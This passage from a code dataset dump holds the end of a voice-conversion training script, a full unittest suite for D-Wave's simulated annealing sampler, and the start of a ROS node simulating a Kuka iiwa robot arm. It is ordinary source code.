)\n\n args = args.parse_args()\n\n with wandb.init(\n project=\"HiFiVC\",\n name=\"norm_real_train\"):\n train(args)","repo_name":"Blinorot/HiFiVC","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42679829117","text":"import unittest\nimport numpy as np\nimport copy\nimport itertools\nimport warnings\n\nimport dimod\n\nimport dwave.samplers.sa as sa\nfrom dwave.samplers.sa import SimulatedAnnealingSampler\n\nclass TestTimingInfo(unittest.TestCase):\n def setUp(self) -> None:\n empty = dimod.BQM(dimod.SPIN)\n one = dimod.BQM.from_ising({\"a\": 1}, {})\n two = dimod.BQM.from_ising({}, {(\"abc\", (1, 2)): -1})\n\n sampler = SimulatedAnnealingSampler()\n rng = np.random.default_rng(48448418563)\n\n self.sample_sets = []\n for bqm in [empty, one, two]:\n sample_set = sampler.sample(bqm, seed=rng.integers(2**30))\n self.sample_sets.append(sample_set)\n\n self.timing_keys = {\"preprocessing_ns\", \"postprocessing_ns\", \"sampling_ns\"}\n\n def test_keys_exist(self):\n for sample_set in self.sample_sets:\n with self.subTest(ss=sample_set):\n self.timing_keys.issubset(sample_set.info['timing'])\n\n def test_strictly_postive_timings(self):\n for sample_set in self.sample_sets:\n for category, duration in sample_set.info['timing'].items():\n self.assertGreater(duration, 0)\n\n\nclass TestSchedules(unittest.TestCase):\n def test_schedules(self):\n sampler = SimulatedAnnealingSampler()\n num_vars = 40\n h = {v: -1 for v in range(num_vars)}\n J = {(u, v): -1 for u in range(num_vars) for v in range(u, num_vars) if u != v}\n num_reads = 10\n for schedule_type in ['geometric','linear']:\n resp = sampler.sample_ising(h, J, num_reads=num_reads, beta_schedule_type=schedule_type)\n\n row, col = resp.record.sample.shape\n\n self.assertEqual(row, num_reads)\n self.assertEqual(col, num_vars) # should get back two variables\n self.assertIs(resp.vartype, dimod.SPIN) # should be ising\n with self.assertRaises(ValueError):\n #Should not accept schedule:\n resp = sampler.sample_ising(h, J, num_reads=num_reads, beta_schedule_type=schedule_type,beta_schedule=[-1,1])\n with self.assertRaises(ValueError):\n sampler.sample_ising(h, J, num_reads=num_reads, beta_schedule_type='asd')\n\n def test_custom_schedule(self):\n sampler = SimulatedAnnealingSampler()\n num_vars = 40\n h = {v: -1 for v in range(num_vars)}\n J = {(u, v): -1 for u in range(num_vars) for v in range(u, num_vars) if u != v}\n num_reads = 1\n with self.assertRaises(ValueError):\n resp = sampler.sample_ising(h, J, num_reads=num_reads, beta_schedule_type='custom')\n with self.assertRaises(ValueError):\n #Positivity\n resp = sampler.sample_ising(h, J, num_reads=num_reads, beta_schedule_type='custom',beta_schedule=[-1,1])\n with self.assertRaises(ValueError):\n #numeric\n resp = sampler.sample_ising(h, J, num_reads=num_reads, beta_schedule_type='custom',beta_schedule=['asd',1])\n\n resp = sampler.sample_ising(h, J, num_reads=num_reads, beta_schedule_type='custom',beta_schedule=[0.1,1])\n\nclass TestSimulatedAnnealingSampler(unittest.TestCase):\n\n def test_instantiation(self):\n sampler = SimulatedAnnealingSampler()\n dimod.testing.assert_sampler_api(sampler)\n\n def test_one_node_beta_range(self):\n h = {'a': -1}\n bqm = dimod.BinaryQuadraticModel(h, {}, 0, dimod.SPIN)\n response = SimulatedAnnealingSampler().sample(bqm)\n hot_beta, cold_beta = response.info['beta_range']\n\n # Check beta values\n # Note: beta is proportional to 1/temperature, therefore hot_beta < cold_beta\n self.assertLess(hot_beta, cold_beta)\n self.assertNotEqual(hot_beta, float(\"inf\"), \"Starting value of 'beta_range' is infinite\")\n self.assertNotEqual(cold_beta, float(\"inf\"), \"Final value of 'beta_range' is infinite\")\n\n def test_one_edge_beta_range(self):\n J = {('a', 'b'): 1}\n bqm = dimod.BinaryQuadraticModel({}, J, 0, dimod.BINARY)\n response = SimulatedAnnealingSampler().sample(bqm)\n hot_beta, cold_beta = response.info['beta_range']\n\n # Check beta values\n # Note: beta is proportional to 1/temperature, therefore hot_beta < cold_beta\n self.assertLess(hot_beta, cold_beta)\n self.assertNotEqual(hot_beta, float(\"inf\"), \"Starting value of 'beta_range' is infinite\")\n self.assertNotEqual(cold_beta, float(\"inf\"), \"Final value of 'beta_range' is infinite\")\n\n def test_sample_ising(self):\n h = {'a': 0, 'b': -1}\n J = {('a', 'b'): -1}\n\n resp = SimulatedAnnealingSampler().sample_ising(h, J)\n\n row, col = resp.record.sample.shape\n\n self.assertEqual(col, 2) # should get back two variables\n self.assertIs(resp.vartype, dimod.SPIN) # should be ising\n\n def test_sample_qubo(self):\n Q = {(0, 1): 1}\n resp = SimulatedAnnealingSampler().sample_qubo(Q)\n\n row, col = resp.record.sample.shape\n\n self.assertEqual(col, 2) # should get back two variables\n self.assertIs(resp.vartype, dimod.BINARY) # should be qubo\n\n def test_basic_response(self):\n sampler = SimulatedAnnealingSampler()\n h = {'a': 0, 'b': -1}\n J = {('a', 'b'): -1}\n response = sampler.sample_ising(h, J)\n\n self.assertIsInstance(response, dimod.SampleSet, \"Sampler returned an unexpected response type\")\n\n def test_num_reads(self):\n sampler = SimulatedAnnealingSampler()\n\n h = {}\n J = {('a', 'b'): .5, (0, 'a'): -1, (1, 'b'): 0.0}\n\n for num_reads in (1, 10, 100, 3223, 10352):\n response = sampler.sample_ising(h, J, num_reads=num_reads)\n row, col = response.record.sample.shape\n\n self.assertEqual(row, num_reads)\n self.assertEqual(col, 4)\n\n for bad_num_reads in (0, -1, -100):\n with self.assertRaises(ValueError):\n sampler.sample_ising(h, J, num_reads=bad_num_reads)\n\n for bad_num_reads in (3.5, float(\"inf\"), \"string\", [], {}):\n with self.assertRaises(TypeError):\n sampler.sample_ising(h, J, num_reads=bad_num_reads)\n\n def test_empty_problem(self):\n sampler = SimulatedAnnealingSampler()\n h = {'a': 0, 'b': -1}\n J = {('a', 'b'): -1}\n eh, eJ = {}, {}\n beta_range = [0.1,1]\n for h in (h, eh):\n for J in (J, eJ):\n _h = copy.deepcopy(h)\n _J = copy.deepcopy(J)\n r = sampler.sample_ising(_h, _J, beta_range=beta_range)\n # An empty problem does not allow for beta_range\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n r = sampler.sample_ising(eh, eJ, beta_range=beta_range)\n\n def test_seed(self):\n sampler = SimulatedAnnealingSampler()\n num_vars = 40\n h = {v: -1 for v in range(num_vars)}\n J = {(u, v): -1 for u in range(num_vars) for v in range(u, num_vars) if u != v}\n num_reads = 1000\n\n # test seed exceptions\n for bad_seed in (3.5, float(\"inf\"), \"string\", [], {}):\n self.assertRaises(TypeError, sampler.sample_ising, {}, {}, seed=bad_seed)\n for bad_seed in (-1, -100, 2**65):\n self.assertRaises(ValueError, sampler.sample_ising, {}, {}, seed=bad_seed)\n\n # no need to do a bunch of sweeps, in fact the less we do the more\n # sure we can be that the same seed is returning the same result\n all_samples = []\n\n for seed in (1, 25, 2352, 736145, 5682453):\n response0 = sampler.sample_ising(h, J, num_reads=num_reads, num_sweeps=10, seed=seed)\n response1 = sampler.sample_ising(h, J, num_reads=num_reads, num_sweeps=10, seed=seed)\n\n samples0 = response0.record.sample\n samples1 = response1.record.sample\n\n self.assertTrue(np.array_equal(samples0, samples1), \"Same seed returned different results\")\n\n for previous_sample in all_samples:\n self.assertFalse(np.array_equal(samples0, previous_sample), \"Different seed returned same results\")\n\n all_samples.append(samples0)\n\n def test_disconnected_problem(self):\n sampler = SimulatedAnnealingSampler()\n h = {}\n J = {\n # K_3\n (0, 1): -1,\n (1, 2): -1,\n (0, 2): -1,\n\n # disonnected K_3\n (3, 4): -1,\n (4, 5): -1,\n (3, 5): -1,\n }\n\n resp = sampler.sample_ising(h, J, num_sweeps=1000, num_reads=100)\n\n row, col = resp.record.sample.shape\n\n self.assertEqual(row, 100)\n self.assertEqual(col, 6) # should get back two variables\n self.assertIs(resp.vartype, dimod.SPIN) # should be ising\n\n\n def test_interrupt_error(self):\n sampler = SimulatedAnnealingSampler()\n num_vars = 40\n h = {v: -1 for v in range(num_vars)}\n J = {(u, v): -1 for u in range(num_vars) for v in range(u, num_vars) if u != v}\n num_reads = 100\n\n def f():\n raise NotImplementedError\n\n resp = sampler.sample_ising(h, J, num_reads=num_reads, interrupt_function=f)\n\n self.assertEqual(len(resp), 1)\n\n def test_sampleset_initial_states(self):\n bqm = dimod.BinaryQuadraticModel.from_ising({}, {'ab': 1, 'bc': 1, 'ca': 1})\n initial_states = dimod.SampleSet.from_samples_bqm({'a': 1, 'b': -1, 'c': 1}, bqm)\n\n response = SimulatedAnnealingSampler().sample(bqm, initial_states=initial_states, num_reads=1)\n\n self.assertEqual(len(response), 1)\n self.assertEqual(response.first.energy, -1)\n\n def test_initial_states_generator(self):\n bqm = dimod.BinaryQuadraticModel.from_ising({}, {'ab': -1, 'bc': 1, 'ac': 1})\n init = dimod.SampleSet.from_samples_bqm([{'a': 1, 'b': 1, 'c': 1},\n {'a': -1, 'b': -1, 'c': -1}], bqm)\n sampler = SimulatedAnnealingSampler()\n\n # 2 fixed initial state, 8 random\n resp = sampler.sample(bqm, initial_states=init, num_reads=10)\n self.assertEqual(len(resp), 10)\n\n # 2 fixed initial states, 8 random, explicit\n resp = sampler.sample(bqm, initial_states=init, initial_states_generator='random', num_reads=10)\n self.assertEqual(len(resp), 10)\n\n # all random\n resp = sampler.sample(bqm, initial_states_generator='random', num_reads=10)\n self.assertEqual(len(resp), 10)\n\n # all random\n resp = sampler.sample(bqm, num_reads=10)\n self.assertEqual(len(resp), 10)\n\n\n # zero-length init states in tuple format, extended by random samples\n zero_init_tuple = (np.empty((0, 3)), ['a', 'b', 'c'])\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n resp = sampler.sample(bqm, initial_states=zero_init_tuple, num_reads=10)\n self.assertEqual(len(resp), 10)\n\n # explicit None for initial_states should use one random init state\n resp = sampler.sample(bqm, initial_states=None)\n self.assertEqual(len(resp), 1)\n\n # initial_states truncated to num_reads?\n resp = sampler.sample(bqm, initial_states=init, initial_states_generator='none', num_reads=1)\n self.assertEqual(len(resp), 1)\n\n resp = sampler.sample(bqm, initial_states=init, initial_states_generator='tile', num_reads=1)\n self.assertEqual(len(resp), 1)\n\n resp = sampler.sample(bqm, initial_states=init, initial_states_generator='random', num_reads=1)\n self.assertEqual(len(resp), 1)\n\n\n # 2 fixed initial states, repeated 5 times\n resp = sampler.sample(bqm, initial_states=init, initial_states_generator='tile', num_reads=10)\n self.assertEqual(len(resp), 10)\n\n # can't tile empty states\n with self.assertRaises(ValueError):\n resp = sampler.sample(bqm, initial_states_generator='tile', num_reads=10)\n\n # not enough initial states\n with self.assertRaises(ValueError):\n resp = sampler.sample(bqm, initial_states_generator='none', num_reads=3)\n\n # initial_states incompatible with the bqm\n init = dimod.SampleSet.from_samples({'a': 1, 'b': 1}, vartype='SPIN', energy=0)\n with self.assertRaises(ValueError):\n resp = sampler.sample(bqm, initial_states=init)\n\n def test_soft_num_reads(self):\n \"\"\"Number of reads adapts to initial_states size, if provided.\"\"\"\n\n bqm = dimod.BinaryQuadraticModel.from_ising({}, {'ab': -1, 'bc': 1, 'ac': 1})\n init = dimod.SampleSet.from_samples_bqm([{'a': 1, 'b': 1, 'c': 1},\n {'a': -1, 'b': -1, 'c': -1}], bqm)\n sampler = SimulatedAnnealingSampler()\n\n # default num_reads == 1\n self.assertEqual(len(sampler.sample(bqm)), 1)\n self.assertEqual(len(sampler.sample(bqm, initial_states_generator=\"random\")), 1)\n\n # with initial_states, num_reads == len(initial_states)\n self.assertEqual(len(sampler.sample(bqm, initial_states=init)), 2)\n\n # ... but explicit truncation works too\n self.assertEqual(len(sampler.sample(bqm, initial_states=init, num_reads=1)), 1)\n\n # if num_reads explicitly given together with initial_states, they are expanded\n self.assertEqual(len(sampler.sample(bqm, initial_states=init, num_reads=3)), 3)\n\n # if num_reads explicitly given together without initial_states, they are generated\n self.assertEqual(len(sampler.sample(bqm, num_reads=4)), 4)\n\n def test_0_num_sweeps(self):\n bqm = dimod.BinaryQuadraticModel({}, {'ab': 1}, 0, 'SPIN')\n sampleset = dimod.SampleSet.from_samples_bqm([{'a': 1, 'b': -1},\n {'a': -1, 'b': 1}], bqm)\n\n result = SimulatedAnnealingSampler().sample(bqm, num_sweeps=0, initial_states=sampleset)\n\n self.assertTrue(np.array_equal(result.record.sample, sampleset.record.sample))\n self.assertEqual(len(result.record.sample), 2)\n\n result = SimulatedAnnealingSampler().sample(\n bqm, num_sweeps=0, num_reads=4,\n initial_states=sampleset, initial_states_generator='tile')\n\n expected = np.tile(sampleset.record.sample, (2, 1))\n\n self.assertTrue(np.array_equal(result.record.sample, expected))\n self.assertEqual(len(result), 4)\n\nclass TestDefaultBetaRange(unittest.TestCase):\n def test_empty_problem(self):\n #Values have no impact on behaviour, but should conform to documented structure\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n beta_range = sa.sampler._default_ising_beta_range({}, {})\n self.assertTrue(len(beta_range)==2 and min(beta_range)>= 0)\n\n def test_single_variable_ising_problem(self):\n h1, c1 = sa.sampler._default_ising_beta_range({'a': 0.1}, {})\n h2, c2 = sa.sampler._default_ising_beta_range({'a': 1}, {})\n h3, c3 = sa.sampler._default_ising_beta_range({'a': 10}, {})\n\n self.assertTrue(h1 > h2 > h3)\n self.assertTrue(c1 > c2 > c3)\n self.assertTrue(h1 < c1 and h2 < c2 and h3 < c3)\n\n def test_single_coupling_ising_problem(self):\n h1, c1 = sa.sampler._default_ising_beta_range({}, {'ab': 0.1})\n h2, c2 = sa.sampler._default_ising_beta_range({}, {'ab': 1})\n h3, c3 = sa.sampler._default_ising_beta_range({}, {'ab': 10})\n self.assertTrue(h1 > h2 > h3)\n self.assertTrue(c1 > c2 > c3)\n self.assertTrue(h1 < c1 and h2 < c2 and h3 < c3)\n\n def test_bias_coupling_ranges(self):\n h1, c1 = sa.sampler._default_ising_beta_range({'a': 1}, {'ab': 1})\n h2, c2 = sa.sampler._default_ising_beta_range({'a': 10}, {'ab': 1})\n h3, c3 = sa.sampler._default_ising_beta_range({'a': 10}, {'ab': 10})\n\n self.assertTrue(h1 > h2 > h3)\n self.assertTrue(c1 == c2 > c3)\n self.assertTrue(h1 < c1 and h2 < c2 and h3 < c3)\n\n def test_default_beta_range(self):\n bqm = dimod.BinaryQuadraticModel.from_ising({'a': 1}, {'bc': 1})\n self.assertEqual(sa.sampler.default_beta_range(bqm),\n sa.sampler.default_beta_range(bqm.binary))\n\n def test_scale_T_with_N(self):\n res1 = sa.sampler._default_ising_beta_range({x: 1 for x in range(10)}, {}, scale_T_with_N=False)\n res2 = sa.sampler._default_ising_beta_range({x: 1 for x in range(10)}, {}, scale_T_with_N=True)\n #2 gaps of 2, should indicate lower end temperature:\n\n self.assertTrue(res1[1] > res1[0] and res1[0]>0)\n self.assertTrue(res2[1] > res2[0] and res2[0]>0)\n self.assertTrue(res1[0] == res2[0])\n self.assertTrue(res2[1] > res1[1])\n\n def test_max_single_qubit_excitation_rate(self):\n res1 = sa.sampler._default_ising_beta_range({x: 1 for x in range(10)}, {}, max_single_qubit_excitation_rate=0.01)\n res2 = sa.sampler._default_ising_beta_range({x: 1 for x in range(10)}, {}, max_single_qubit_excitation_rate=0.0001)\n #Lower rate should indicate lower end temperature:\n self.assertTrue(res1[1] > res1[0] and res1[0]>0)\n self.assertTrue(res2[1] > res2[0] and res2[0]>0)\n self.assertTrue(res1[0] == res2[0])\n self.assertTrue(res2[1] > res1[1])\n\nclass TestHeuristicResponse(unittest.TestCase):\n def test_job_shop_scheduling_with_linear(self):\n # Set up a job shop scheduling BQM\n #\n # Provide hardcode version of the bqm of \"jobs\"\n # jobs = {'b': [(1,1), (3,1)],\n # 'o': [(2,2), (4,1)],\n # 'g': [(1,2)]}\n #\n # There are three jobs: 'b', 'o', 'g'\n # Each tuple represents a task that runs on a particular machine for a given amount of\n # time. I.e. (machine_id, duration_on_machine)\n #\n # Variables below are labelled as '_,'.\n linear = {'b_0,0': -2.0,\n 'b_0,1': -2.0,\n 'b_0,2': -2.0,\n 'b_0,3': -2.0,\n 'b_1,0': 0.125,\n 'b_1,1': -1.5,\n 'b_1,2': 0.0,\n 'g_0,0': -1.875,\n 'g_0,1': -1.5,\n 'g_0,2': 0.0,\n 'o_0,0': -2.0,\n 'o_0,1': -2.0,\n 'o_0,2': -2.0,\n 'o_1,0': 0.03125,\n 'o_1,1': -1.875,\n 'o_1,2': -1.5,\n 'o_1,3': 0.0}\n\n quadratic = {('b_0,0', 'g_0,0'): 4,\n ('b_0,1', 'b_0,0'): 4.0,\n ('b_0,1', 'g_0,0'): 2,\n ('b_0,2', 'b_0,0'): 4.0,\n ('b_0,2', 'b_0,1'): 4.0,\n ('b_0,2', 'b_1,2'): 2,\n ('b_0,2', 'g_0,1'): 2,\n ('b_0,2', 'g_0,2'): 4,\n ('b_0,3', 'b_0,0'): 4.0,\n ('b_0,3', 'b_0,1'): 4.0,\n ('b_0,3', 'b_0,2'): 4.0,\n ('b_0,3', 'b_1,2'): 2,\n ('b_0,3', 'g_0,2'): 2,\n ('b_1,1', 'b_0,1'): 2,\n ('b_1,1', 'b_0,2'): 2,\n ('b_1,1', 'b_0,3'): 2,\n ('b_1,1', 'b_1,2'): 4.0,\n ('g_0,1', 'b_0,1'): 4,\n ('g_0,1', 'g_0,0'): 4.0,\n ('g_0,2', 'g_0,0'): 4.0,\n ('g_0,2', 'g_0,1'): 4.0,\n ('o_0,0', 'o_1,1'): 2,\n ('o_0,1', 'o_0,0'): 4.0,\n ('o_0,1', 'o_1,1'): 2,\n ('o_0,1', 'o_1,2'): 2,\n ('o_0,2', 'o_0,0'): 4.0,\n ('o_0,2', 'o_0,1'): 4.0,\n ('o_0,2', 'o_1,1'): 2,\n ('o_1,2', 'o_0,2'): 2,\n ('o_1,2', 'o_1,1'): 4.0,\n ('o_1,3', 'o_0,2'): 2,\n ('o_1,3', 'o_1,1'): 4.0,\n ('o_1,3', 'o_1,2'): 4.0}\n\n jss_bqm = dimod.BinaryQuadraticModel(linear, quadratic, 9.0, dimod.BINARY)\n\n # Optimal energy\n optimal_solution = {'b_0,0': 1, 'b_0,1': 0, 'b_0,2': 0, 'b_0,3': 0,\n 'b_1,0': 0, 'b_1,1': 1, 'b_1,2': 0,\n 'g_0,0': 0, 'g_0,1': 1, 'g_0,2': 0,\n 'o_0,0': 1, 'o_0,1': 0, 'o_0,2': 0,\n 'o_1,0': 0, 'o_1,1': 0, 'o_1,2': 1, 'o_1,3': 0}\n optimal_energy = jss_bqm.energy(optimal_solution) # Evaluates to 0.5\n\n # Get heuristic solution\n sampler = SimulatedAnnealingSampler()\n response = sampler.sample(jss_bqm, beta_schedule_type=\"linear\", num_reads=10)\n _, response_energy, _ = next(response.data())\n\n # Compare energies\n threshold = 0.1 # Arbitrary threshold\n self.assertLess(response_energy, optimal_energy + threshold)\n\n def test_cubic_lattice_with_geometric(self):\n # Set up all lattice edges in a cube. Each edge is labelled by a 3-D coordinate system\n def get_cubic_lattice_edges(N):\n for x, y, z in itertools.product(range(N), repeat=3):\n u = x, y, z\n yield u, ((x+1)%N, y, z)\n yield u, (x, (y+1)%N, z)\n yield u, (x, y, (z+1)%N)\n\n # Add a J-bias to each edge\n np_rand = np.random.RandomState(128)\n J = {e: np_rand.choice((-1, 1)) for e in get_cubic_lattice_edges(12)}\n\n # Solve ising problem\n sampler = SimulatedAnnealingSampler()\n response = sampler.sample_ising({}, J, beta_schedule_type=\"geometric\", num_reads=10)\n _, response_energy, _ = next(response.data())\n\n # Note: lowest energy found was -3088 with a different benchmarking tool\n threshold = -3000\n self.assertLess(response_energy, threshold, (\"response_energy, {}, exceeds \"\n \"threshold\").format(response_energy))\n\nclass TestCoreSpinUpdate(unittest.TestCase):\n sampler = SimulatedAnnealingSampler()\n # Tighter randomized unit tests can fail randomly, using a seed prevents rare (but\n # confusing) false alarms.\n seed = 2023\n \n def make_confidence_interval(self, p, num_samples, k=3):\n # Spins flip with probability p\n # mean number of flips per sweep = num_var*p\n # variance = num_var*p*(1-p)\n # A k sigma interval for number of flips is roughly mean +/- k root(var)\n\n mu = num_samples*p\n sig = np.sqrt(num_samples*p*(1-p))\n upper_bound = mu + k*sig\n lower_bound = mu - k*sig\n \n return lower_bound, upper_bound\n \n def test_Metropolis_ergodicity_breaking(self):\n # Default operation, Metropolis sequential order - deterministic in\n # Null BQM (flat energy landscape) given fixed initial condition.\n num_vars = 100\n # test result is independent of the realization, so no need for seed\n init_vector = 1 - 2*np.random.randint(2, size=num_vars)\n bqm = dimod.BinaryQuadraticModel.from_ising(\n {i : 0 for i in range(num_vars)},{})\n initial_states = dimod.SampleSet.from_samples_bqm(\n {i : init_vector[i] for i in range(num_vars)}, bqm)\n beta_range = [0.1,1] # Bypass ill-conditioned (pathological context) routine.\n # Spins oscillate (ergodicity breaking):\n for num_sweeps in range(3):\n response = SimulatedAnnealingSampler().sample(\n bqm, initial_states=initial_states, num_reads=1,\n num_sweeps=num_sweeps, beta_range=beta_range)\n self.assertTrue(np.all(response.record.sample == (-1)**num_sweeps * init_vector))\n\n def test_central_limits_random_updates(self):\n # Gibbs update, and random ordering, produce probabilistic results\n # We can however be quite confident in central limits. To avoid rare\n # failures, the seed is set. If a failure is encountered (because the\n # pseudo random number generator is changed and we are simply unlucky\n # a new seed can be hard coded (and that should with high probability\n # resolve the problem in the absence of real bugs.\n num_vars = 10000\n bqm = dimod.BinaryQuadraticModel.from_ising(\n {i : 0 for i in range(num_vars)},{})\n initial_states = dimod.SampleSet.from_samples_bqm(\n {i : 1 for i in range(num_vars)}, bqm)\n k = 3 # Significance threshold\n beta_range = [0.1,1] #Bypass ill-conditioned (pathological context) routine.\n # Gibbs sequential order sweep (test of central limit):\n p = 0.5\n lower_bound, upper_bound = self.make_confidence_interval(p, num_vars, k)\n response = SimulatedAnnealingSampler().sample(\n bqm, initial_states=initial_states, num_reads=1, seed=self.seed,\n num_sweeps=1, proposal_acceptance_criteria='Gibbs',\n beta_range=beta_range)\n stat = np.sum(response.record.sample==1)\n self.assertLess(stat, upper_bound)\n self.assertGreater(stat, lower_bound)\n # Metropolis random order sweep (test of central limit):\n # A spin will flip on a sweep if selected (with replacement) an odd\n # number of times. We anticipate roughly Poissonian statistics for\n # large num_var (large enough here). P(x = num selections) =\n # exp(-1)/x!, P(selected twice) = (1/2)^2 exp(-1)/2!, etc.\n # p = P(flipped) = exp(-1)*[1 + 1/2! + 1/4! ..] = exp(-1)*cosh(1) = 0.568\n # Roughly a Bernouilli random number, hence:\n p = np.cosh(1)*np.exp(-1)\n lower_bound, upper_bound = self.make_confidence_interval(p, num_vars, k)\n # proposal_acceptance_critera = 'Metropois' by default:\n response = SimulatedAnnealingSampler().sample(\n bqm, initial_states=initial_states, num_reads=1, seed=self.seed,\n num_sweeps=1, randomize_order=True, beta_range=beta_range) \n stat = np.sum(response.record.sample==1)\n self.assertLess(stat, upper_bound)\n self.assertGreater(stat, lower_bound)\n # Gibbs randomized order: 50:50 on states sampled once.\n p = 1/np.exp(1) + (1-1/np.exp(1))*0.5;\n lower_bound, upper_bound = self.make_confidence_interval(p, num_vars, k)\n response = SimulatedAnnealingSampler().sample(\n bqm, initial_states=initial_states, num_reads=1, seed=self.seed,\n num_sweeps=1, randomize_order=True, proposal_acceptance_criteria='Gibbs',\n beta_range=beta_range)\n stat = np.sum(response.record.sample==1)\n self.assertLess(stat, upper_bound)\n self.assertGreater(stat, lower_bound)\n # Gibbs with energy signal, regardless of num_sweeps and initial condition expect +1\n # state with probability exp(beta_final)/[exp(beta_final) + exp(-beta_final)] on every\n # updated state (all states given sequential order)\n bqm = dimod.BinaryQuadraticModel.from_ising(\n {i : 1 for i in range(num_vars)}, {})\n betas = [1, 1.5]\n p = np.exp(-betas[-1])/(2*np.cosh(betas[-1]))\n lower_bound, upper_bound = self.make_confidence_interval(p, num_vars, k)\n response = SimulatedAnnealingSampler().sample(\n bqm, initial_states=initial_states, num_reads=1, seed=self.seed,\n proposal_acceptance_criteria='Gibbs',\n beta_schedule_type='custom', beta_schedule=betas, num_sweeps_per_beta=1)\n stat = np.sum(response.record.sample==1)\n self.assertLess(stat, upper_bound)\n self.assertGreater(stat, lower_bound)\n \n def test_greedy_limit_independent_spins(self):\n num_vars = 10000\n # test result is independent of the realization, so no need for seed\n init_vector = np.random.normal(size=num_vars)\n bqm = dimod.BinaryQuadraticModel.from_ising(\n {i : init_vector[i] for i in range(num_vars)},{})\n beta_schedule_type = 'custom'\n beta_schedule = [float('inf')]\n k = 3 # Significance threshold\n # Check escape from/to trivial ground state, all methods:\n ground_state_vec = np.array([-int(np.sign(bqm.linear[i]))\n for i in range(num_vars)])\n ground_state = dimod.SampleSet.from_samples_bqm(\n {i : ground_state_vec[i] for i in range(num_vars)}, bqm)\n sky_state = dimod.SampleSet.from_samples_bqm(\n {i : -ground_state_vec[i] for i in range(num_vars)}, bqm)\n # All touched spins escape to the ground state.\n p = 1 - np.exp(-1) # ~Probability index sampled atleast once:\n lower_bound, upper_bound = self.make_confidence_interval(p, num_vars, k)\n for randomize_order in [False, True]:\n for proposal_acceptance_criteria in ['Metropolis', 'Gibbs']:\n response = SimulatedAnnealingSampler().sample(\n bqm, initial_states=ground_state, num_reads=1,\n num_sweeps=1, randomize_order=randomize_order,\n proposal_acceptance_criteria=proposal_acceptance_criteria,\n beta_schedule_type=beta_schedule_type,\n beta_schedule=beta_schedule, seed=self.seed)\n self.assertTrue(np.all(response.record.sample==\n ground_state_vec))\n response = SimulatedAnnealingSampler().sample(\n bqm, initial_states=sky_state, num_reads=1,\n num_sweeps=1, randomize_order=randomize_order,\n proposal_acceptance_criteria=proposal_acceptance_criteria,\n beta_schedule_type=beta_schedule_type,\n beta_schedule=beta_schedule, seed=self.seed)\n if randomize_order == False:\n # Recovers ground state\n self.assertTrue(np.all(response.record.sample==\n ground_state_vec))\n else:\n # Partial recovery only (inline with sampled indices)\n stat = np.sum(response.record.sample==ground_state_vec)\n self.assertLess(stat, upper_bound)\n self.assertGreater(stat, lower_bound)\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"dwavesystems/dwave-samplers","sub_path":"tests/test_simulated_annealing_sampler.py","file_name":"test_simulated_annealing_sampler.py","file_ext":"py","file_size_in_byte":30261,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"16470763686","text":"#!/usr/bin/env python3\n\nimport rospy\nimport roboticstoolbox as rtb\nfrom math import pi\nimport swift\nimport time\nimport numpy as np\nfrom std_msgs.msg import String\n\n\nclass KukaSimulatedROS:\n def __init__(self) -> None:\n \n \n # Kuka LBR iiwa 14 R820 from robotic toolbox library\n self.kuka_robot_urdf = rtb.models.URDF.LBR()\n\n # Make a listener for kuka_iiwa commands\n rospy.Subscriber(\"kuka_command\", String, self.command_callback)\n\n # Make Publishers for all kuka_iiwa data\n self.pub_JointPosition = rospy.Publisher('JointPosition', String, queue_size=10)\n self.pub_ToolPosition = rospy.Publisher('ToolPosition', String, queue_size=10)\n self.pub_ToolForce = rospy.Publisher('ToolForce', String, queue_size=10)\n self.pub_ToolTorque = rospy.Publisher('ToolTorque', String, queue_size=10)\n self.pub_isCompliance = rospy.Publisher('isCompliance', String, queue_size=10)\n self.pub_isCollision = rospy.Publisher('isCollision', String, queue_size=10)\n self.pub_isReadyToMove = rospy.Publisher('isReadyToMove', String, queue_size=10)\n self.pub_isMastered = rospy.Publisher('isMastered', String, queue_size=10)\n self.pub_OperationMode = rospy.Publisher('OperationMode', String, queue_size=10)\n self.pub_JointAcceleration = rospy.Publisher('JointAcceleration', String, queue_size=10)\n self.pub_JointVelocity = rospy.Publisher('JointVelocity', String, queue_size=10)\n self.pub_JointJerk = rospy.Publisher('JointJerk', String, queue_size=10)\n self.pub_isFinished = rospy.Publisher('isFinished', String, queue_size=10)\n self.pub_hasError = rospy.Publisher('hasError', String, queue_size=10)\n self.pub_OperatorAck = rospy.Publisher('OperatorAck', String, queue_size=10)\n\n # Make kuka_iiwa node\n rospy.init_node('iiwa_simulation', disable_signals=True)\n rospy.loginfo(\"iiwa_simulation node started\")\n rate = rospy.Rate(100) # 100hz update rate.\n\n # Kuka state\n self.JointPosition = [0,0,0,0,0,0,0]\n self.ToolPosition = [0,0,0,0,0,0]\n self.ToolForce = [0,0,0]\n self.ToolTorque = [0,0,0]\n self.isCompliance = False\n self.isCollision = False\n self.isReadyToMove = True\n self.isMastered = True\n self.OperationMode = 0\n self.JointAcceleration = [0,0,0,0,0,0,0]\n self.JointVelocity = [0,0,0,0,0,0,0]\n self.JointJerk = [0,0,0,0,0,0,0]\n self.isFinished = True\n self.hasError = False\n self.OperatorAck = False\n\n # Desired state\n self.DesPosition = [0,0,0,0,0,0,0]\n self.move_flag = False\n\n # start a rostimer to publish states\n publish_fps = 100\n rospy.Timer(rospy.Duration(1/publish_fps), self.publish_states)\n\n def command_callback(self, msg):\n rospy.loginfo(\"Command received: %s\", msg.data)\n \n # handle if command is SetPosition\n data = msg.data\n command = data.split(' ')[0]\n args = data.split(' ')[1:]\n if command == \"setPosition\":\n if len(args) != 7:\n rospy.logerr(\"setPosition command requires 7 arguments\")\n return\n \n # get desired joint position\n for i in range(7):\n self.DesPosition[i] = args[i]\n\n # set move flag\n self.move_flag = True\n \n # TODO: implement another commands\n \n return\n def list_to_string(self, list):\n return ' '.join(map(str, list))\n\n def publish_states(self, event):\n\n # update joint position in degrees\n self.JointPosition = [round(qi * 180 / pi, 3) for qi in self.kuka_robot_urdf.q]\n\n # update tool position\n self.tool_position_t = self.kuka_robot_urdf.fkine(self.kuka_robot_urdf.q).t\n self.tool_position_r = 